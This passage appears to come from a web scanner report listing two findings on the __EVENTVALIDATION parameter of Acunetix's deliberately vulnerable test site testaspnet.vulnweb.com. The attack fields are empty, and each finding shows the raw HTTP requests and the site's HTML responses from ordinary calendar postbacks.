Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8591&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgCAtprYgNsIZGRkJBfEZ9RpiEV1HOqjGhEefnYGOWk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW6t28BgKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCs0%2FD3LtIj8cxd%2F20vkvvZdBTt3b
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:17 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgCAtprYgNsIZGRkJBfEZ9RpiEV1HOqjGhEefnYGOWk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW6t28BgKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCs0/D3LtIj8cxd/20vkvvZdBTt3b" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:White" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8408&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAHkkL8doIZGRksXjxDG7HB9kKqZJczgC095sOik4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW8bPDAgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXxcDTQg6Rk8ioyxOVMFhUDgqQxQg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:58 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAHkkL8doIZGRksXjxDG7HB9kKqZJczgC095sOik4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW8bPDAgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXxcDTQg6Rk8ioyxOVMFhUDgqQxQg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:White" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is 